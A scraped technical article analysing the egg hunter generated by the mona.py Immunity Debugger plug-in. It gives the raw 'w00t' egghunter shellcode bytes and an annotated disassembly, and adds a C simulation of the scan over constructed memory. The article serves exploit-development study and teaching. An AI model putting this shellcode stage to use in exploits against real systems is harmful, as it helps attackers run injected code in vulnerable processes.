Analysis of the egg hunter method of mona.py

Source: Internet
Author: User


Mona is a plug-in for Immunity Debugger. It is powerful: it helps exploit developers quickly find a desired instruction sequence and offers many useful memory search functions. It also includes an egg hunter code generation function; the default output is as follows:

 

====================================================================================================
Output generated by mona.py v1.1
Corelan Team - http://www.corelan.be
====================================================================================================
OS: xp, release 5.1.2600
Process being debugged: php (pid 15016)
====================================================================================================
22:20:41
====================================================================================================
Egghunter, tag w00t:
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Put this tag in front of your shellcode: w00tw00t

After stepping through this instruction sequence in OllyDbg (OD), the disassembly can be annotated as follows:

 

00406030  66:81CA FF0F   or dx, 0FFF                 ; set the low 12 bits of EDX: it now points at the last byte of the current page
00406035  42             inc edx                     ; advance EDX by one byte (right after the OR this is the first byte of the next page)
00406036  52             push edx                    ; save EDX on the stack
00406037  6A 02          push 2
00406039  58             pop eax                     ; EAX = 2, the system call number
0040603A  CD 2E          int 2E                      ; issue the system call; EDX is passed as its argument pointer
0040603C  3C 05          cmp al, 5                   ; compare the low byte of the returned status with 5. Note that if the memory at EDX is not writable, EAX = C0000005 or C00000C5
0040603E  5A             pop edx                     ; restore the EDX value
0040603F  74 EF          je short shellcod.00406030  ; if [EDX] cannot be written, jump back to the OR and skip to the next page
00406041  B8 77303074    mov eax, 74303077           ; EAX = the tag "w00t" stored little-endian
00406046  8BFA           mov edi, edx
00406048  AF             scas dword ptr es:[edi]     ; check whether the dword EDI points to equals EAX
00406049  75 EA          jnz short shellcod.00406035 ; no match: advance EDX by one byte and try again
0040604B  AF             scas dword ptr es:[edi]     ; if it matched, check the next dword too (note that SCAS added 4 to EDI)
0040604C  75 E7          jnz short shellcod.00406035 ; the second tag is missing: jump back
0040604E  FFE7           jmp edi                     ; egg found: jump to the code right after it and execute
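To make the scan logic in the listing easier to follow, here is an added C model of the hunter's control flow. It is example code written for this page, not code from the article or from mona.py. It performs the same page walk and double-tag check over a constructed 32 KiB address space in which the INT 2E probe is replaced by a lookup in a made-up page table; the page size 0x1000, the unreadable page, and the addresses 0x1100 and 0x3200 are all constructed. It also shows why mona asks for the tag twice: a lone "w00t" (such as the hunter's own mov-immediate) is skipped, and only "w00tw00t" is accepted.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_SIZE 0x1000u
#define NUM_PAGES 8u                        /* constructed address space: 8 pages (32 KiB) */
#define STATUS_LOW_ACCESS_VIOLATION 0x05u   /* low byte of C0000005, what "cmp al, 5" tests */

static uint8_t memory[NUM_PAGES * PAGE_SIZE];   /* constructed flat memory */
static bool    page_readable[NUM_PAGES];        /* constructed page table */

/* The "mov eax, 74303077" immediate is just the tag bytes stored little-endian. */
uint32_t tag_to_word(const char tag[4]) {
    return (uint32_t)(uint8_t)tag[0]
         | (uint32_t)(uint8_t)tag[1] << 8
         | (uint32_t)(uint8_t)tag[2] << 16
         | (uint32_t)(uint8_t)tag[3] << 24;
}

/* Stand-in for "push 2; pop eax; int 2e": the system call is only used as a safe
 * way to test whether the page at EDX is accessible. Returns the low byte of the
 * status, so an unmapped page yields 5 just as C0000005 does. */
static uint32_t probe(uint32_t addr) {
    uint32_t page = addr / PAGE_SIZE;
    if (page >= NUM_PAGES || !page_readable[page]) return STATUS_LOW_ACCESS_VIOLATION;
    return 0;
}

/* "scas dword ptr es:[edi]" compares the little-endian dword at EDI with EAX. */
static uint32_t load32(uint32_t addr) {
    return tag_to_word((const char *)&memory[addr]);
}

/* Mirrors the listing's control flow. Returns the address "jmp edi" would land on
 * (the first byte after "w00tw00t"), or 0 once the constructed space is exhausted. */
uint32_t egghunt(uint32_t start) {
    const uint32_t egg   = tag_to_word("w00t");
    const uint32_t limit = NUM_PAGES * PAGE_SIZE;
    uint32_t edx = start | 0x0FFF;               /* 00406030: or dx, 0FFF -> last byte of this page */
    for (;;) {
        edx++;                                   /* 00406035: inc edx */
        if (edx + 8 > limit) return 0;           /* the real hunter has no bound; it wraps at 4 GiB */
        if (probe(edx) == STATUS_LOW_ACCESS_VIOLATION) {
            edx |= 0x0FFF;                       /* 0040603F: je 00406030 -> skip the whole page */
            continue;
        }
        uint32_t edi = edx;                      /* 00406046: mov edi, edx */
        if (load32(edi) == egg && load32(edi + 4) == egg)
            return edi + 8;                      /* 0040604E: jmp edi (after two SCAS, EDI = EDX + 8) */
        /* 00406049 / 0040604C: jnz 00406035 -> fall through to inc edx */
    }
}

/* Constructed layout: a lone "w00t" (like the hunter's own mov-immediate), an
 * unmapped page the probe must skip, then the real egg followed by one placeholder
 * byte standing in for the payload. Returns the expected landing address. */
#define DECOY_ADDR 0x1100u
#define EGG_ADDR   0x3200u
uint32_t setup_memory(void) {
    memset(memory, 0, sizeof memory);
    for (uint32_t i = 0; i < NUM_PAGES; i++) page_readable[i] = true;
    page_readable[2] = false;
    memcpy(&memory[DECOY_ADDR], "w00t", 4);
    memcpy(&memory[EGG_ADDR], "w00tw00t", 8);
    memory[EGG_ADDR + 8] = 0xCC;                 /* int3 placeholder, never executed here */
    return EGG_ADDR + 8;
}

int main(void) {
    uint32_t expect = setup_memory();
    uint32_t found  = egghunt(0);
    printf("tag word: 0x%08x\n", tag_to_word("w00t"));
    printf("hunter landed at 0x%08x, expected 0x%08x\n", found, expect);
    return found == expect ? 0 : 1;
}
```

Starting the model at 0 walks page 1, passes over the decoy at 0x1100 because the dword after it is not a second tag, hits the unreadable page 2 and skips it in one step instead of faulting, and lands at 0x3208. Starting past the egg returns 0, which is the model's way of saying the real hunter would keep scanning until it wrapped.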

 

From painful beliefs
